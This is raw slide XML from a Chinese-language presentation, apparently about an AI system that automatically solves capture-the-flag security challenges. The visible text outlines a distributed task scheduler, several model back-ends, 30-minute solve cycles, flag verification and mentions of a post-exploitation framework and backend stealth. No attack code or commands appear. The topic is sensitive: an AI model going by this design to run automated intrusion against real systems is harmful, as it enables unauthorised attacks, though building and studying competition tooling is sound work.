            <a:off x="381635" y="1610995"/>
            <a:ext cx="10046970" cy="4996180"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 3827"/>
            </a:avLst>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本框 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381635" y="953770"/>
            <a:ext cx="9687560" cy="50673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前期</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失败反馈</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-&gt;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优化架构</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后期</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批量重复</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-&gt;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稳定性</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分布式</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架构</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13" name="图片 12"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="592455" y="2855595"/>
            <a:ext cx="5716270" cy="3636645"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 5028"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="图片 10"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3783330" y="2245360"/>
            <a:ext cx="7620000" cy="3511550"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 4611"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="15" name="图片 14"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm rot="300000" flipV="1">
            <a:off x="3220861" y="4778735"/>
            <a:ext cx="540000" cy="540000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="文本框 15"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381635" y="953770"/>
            <a:ext cx="11021695" cy="1753235"/>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采用分布式架构设计</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将任务管理与任务执行解耦</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支持多平台多节点</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统一</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调度</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提升并发</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效率</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增加</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后端隐蔽性</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天然的</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后渗透框架</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比赛解题</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规划</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 name="文本框 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381635" y="1062990"/>
            <a:ext cx="8780145" cy="92202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赛段周期</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h</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单次做题周期</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：30min ｜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单次并发做题数</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 ｜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并发</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进程数</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：4</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15" name="图片 14"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2898775" y="2413635"/>
            <a:ext cx="540000" cy="540000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="文本框 15"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3469640" y="2413635"/>
            <a:ext cx="1325245" cy="50673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赛题</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平台</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7" name="圆角矩形 16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2711450" y="2320925"/>
            <a:ext cx="1993900" cy="781050"/>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24" name="组合 23"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2560320" y="5138420"/>
            <a:ext cx="2382520" cy="1105535"/>
            <a:chOff x="1587" y="8348"/>
            <a:chExt cx="3752" cy="1741"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="6" name="组合 5"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1827" y="8621"/>
              <a:ext cx="1022" cy="678"/>
              <a:chOff x="2646" y="3900"/>
              <a:chExt cx="1394" cy="1024"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="3" name="矩形 2"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="2911" y="4243"/>
                <a:ext cx="682" cy="532"/>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2774" y="4243"/>
                <a:ext cx="682" cy="378"/>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3"/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="2646" y="3900"/>
                <a:ext cx="1394" cy="1025"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
        </p:grpSp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="10" name="组合 9"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="2920" y="8502"/>
              <a:ext cx="907" cy="907"/>
              <a:chOff x="8100" y="3900"/>
              <a:chExt cx="3000" cy="3000"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="9" name="矩形 8"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="8502" y="4293"/>
                <a:ext cx="2136" cy="2218"/>
              </a:xfrm>
              <a:prstGeom prst="rect">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4"/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="8100" y="3900"/>
                <a:ext cx="3000" cy="3000"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
        </p:grpSp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="12" name="图片 11" descr="tencent"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId5"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="3996" y="8495"/>
              <a:ext cx="884" cy="884"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="18" name="圆角矩形 17"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1587" y="8348"/>
              <a:ext cx="3597" cy="1740"/>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198" y="9291"/>
              <a:ext cx="3141" cy="798"/>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多</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api</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候选</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池</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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="23" name="组合 22"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2706370" y="3714115"/>
            <a:ext cx="2106295" cy="781050"/>
            <a:chOff x="2021" y="5981"/>
            <a:chExt cx="3317" cy="1230"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="20" name="图片 19"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId6"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="2198" y="6176"/>
              <a:ext cx="850" cy="850"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="21" name="圆角矩形 20"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2021" y="5981"/>
              <a:ext cx="3140" cy="1230"/>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文本框 21"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3252" y="6099"/>
              <a:ext cx="2087" cy="798"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>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题目列表</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grpSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="25" name="直接箭头连接符 24"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="17" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="3703320" y="3101975"/>
            <a:ext cx="5080" cy="612140"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
            <a:prstDash val="sysDash"/>
            <a:tailEnd type="arrow"/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="2">
            <a:schemeClr val="accent1"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:srgbClr val="FFFFFF"/>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:srgbClr val="FFFFFF"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="tx1"/>
          </a:fontRef>
        </p:style>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="文本框 25"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3715385" y="3104515"/>
            <a:ext cx="1325245" cy="50673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下发</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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="27" name="直接箭头连接符 26"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="3687445" y="4517390"/>
            <a:ext cx="5080" cy="612140"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:tailEnd type="arrow"/>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3762375" y="4534535"/>
            <a:ext cx="1604645" cy="50673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初始</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随机</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三题</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9" name="文本框 28"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="560705" y="4711700"/>
            <a:ext cx="1605280" cy="414020"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" indent="0" algn="l" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
            </a:pPr>
            <a:r>
              <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--mode tencent</a:t>
            </a:r>
            <a:endPar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0" name="文本框 29"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="560705" y="5236210"/>
            <a:ext cx="1605280" cy="414020"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" indent="0" algn="l" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
            </a:pPr>
            <a:r>
              <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--mode silicon</a:t>
            </a:r>
            <a:endPar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1" name="文本框 30"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="560705" y="5760720"/>
            <a:ext cx="1702435" cy="414020"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" indent="0" algn="l" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
            </a:pPr>
            <a:r>
              <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--mode deepseek</a:t>
            </a:r>
            <a:endPar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2" name="文本框 31"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="560705" y="6285230"/>
            <a:ext cx="1681480" cy="414020"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" indent="0" algn="l" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
            </a:pPr>
            <a:r>
              <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--mode random</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1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3" name="左大括号 32"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="2262505" y="4946015"/>
            <a:ext cx="224155" cy="1683385"/>
          </a:xfrm>
          <a:prstGeom prst="leftBrace">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36" name="圆角矩形 35"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5416550" y="5311775"/>
            <a:ext cx="1993900" cy="781050"/>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7" name="文本框 36"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6044565" y="5400675"/>
            <a:ext cx="1487805" cy="506730"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>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30</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分钟</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解题</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38" name="图片 37"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5514975" y="5435600"/>
            <a:ext cx="540000" cy="540000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="39" name="直接箭头连接符 38"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4838700" y="5742940"/>
            <a:ext cx="574675" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="bg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0" name="直接箭头连接符 39"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="6413500" y="4805045"/>
            <a:ext cx="0" cy="514350"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:tailEnd type="arrow"/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="2">
            <a:schemeClr val="accent1"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:srgbClr val="FFFFFF"/>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:srgbClr val="FFFFFF"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="tx1"/>
          </a:fontRef>
        </p:style>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="41" name="文本框 40"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6455410" y="4737100"/>
            <a:ext cx="1325245" cy="50673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发现</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Flag</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42" name="图片 41"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId8"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5601335" y="4120515"/>
            <a:ext cx="540000" cy="540000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="43" name="圆角矩形 42"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5413375" y="4008755"/>
            <a:ext cx="1993900" cy="781050"/>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文本框 43"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6071235" y="4090670"/>
            <a:ext cx="1325245" cy="506730"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>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flag{xxxx}</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6" name="文本框 45"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6406515" y="3415030"/>
            <a:ext cx="1325245" cy="506730"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" indent="0" algn="l" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>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验证</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48" name="图片 47"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId9"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5492115" y="2577465"/>
            <a:ext cx="540000" cy="540000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="52" name="左中括号 51"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="16200000">
            <a:off x="6301740" y="2682240"/>
            <a:ext cx="224155" cy="1235075"/>
          </a:xfrm>
          <a:prstGeom prst="leftBracket">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="bg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53" name="直接连接符 52"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="43" idx="0"/>
            <a:endCxn id="52" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="6410325" y="3411855"/>
            <a:ext cx="3810" cy="59690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pic>
        <p:nvPicPr>
          <p:cNvPr id="55" name="图片 54"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId10">
            <a:duotone>
              <a:prstClr val="black"/>
              <a:schemeClr val="accent6">
                <a:tint val="45000"/>
                <a:satMod val="400000"/>
              </a:schemeClr>
            </a:duotone>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6729095" y="2585720"/>
            <a:ext cx="540000" cy="540000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="56" name="肘形连接符 55"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000" flipV="1">
            <a:off x="6003397" y="4108978"/>
            <a:ext cx="2736000" cy="187960"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector4">
            <a:avLst>
              <a:gd name="adj1" fmla="val -33"/>
              <a:gd name="adj2" fmla="val 226520"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
            <a:tailEnd type="arrow"/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="2">
            <a:schemeClr val="accent1"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:srgbClr val="FFFFFF"/>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:srgbClr val="FFFFFF"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="tx1"/>
          </a:fontRef>
        </p:style>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="57" name="直接箭头连接符 56"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7418070" y="5737225"/>
            <a:ext cx="1441450" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:tailEnd type="arrow"/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="2">
            <a:schemeClr val="accent1"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:srgbClr val="FFFFFF"/>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:srgbClr val="FFFFFF"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="tx1"/>
          </a:fontRef>
        </p:style>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="58" name="文本框 57"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7396480" y="5679440"/>
            <a:ext cx="1541145" cy="50673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未发现</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Flag</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59" name="文本框 58"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8859520" y="5252720"/>
            <a:ext cx="2757805" cy="922020"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>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释放</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资源池</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fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>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接收</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下一题</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61" name="图片 60"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId11"/>
          <a:srcRect r="11392"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8482965" y="3371215"/>
            <a:ext cx="3134995" cy="1006475"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 11774"/>
            </a:avLst>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="62" name="图片 61"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId12"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8482965" y="1929130"/>
            <a:ext cx="3134995" cy="1297940"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 10960"/>
            </a:avLst>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="63" name="圆角矩形 62"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8349615" y="1804670"/>
            <a:ext cx="3397885" cy="2712720"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 6928"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="bg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654050" y="2748280"/>
            <a:ext cx="6870065" cy="1414780"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" algn="ctr">
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
            </a:pPr>
            <a:r>
              <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未来</a:t>
            </a:r>
            <a:r>
              <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已来</a:t>
            </a:r>
            <a:endPar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ctr">
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
            </a:pPr>
            <a:r>
              <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打造</a:t>
            </a:r>
            <a:r>
              <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AI+</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网安浪潮的</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掌舵手</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1040765" y="1699260"/>
            <a:ext cx="6096000" cy="768350"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" algn="ctr">
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"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4</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"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圆角矩形 27"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="402590" y="5140325"/>
            <a:ext cx="11017885" cy="598170"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg2">
              <a:lumMod val="1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圆角矩形 26"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
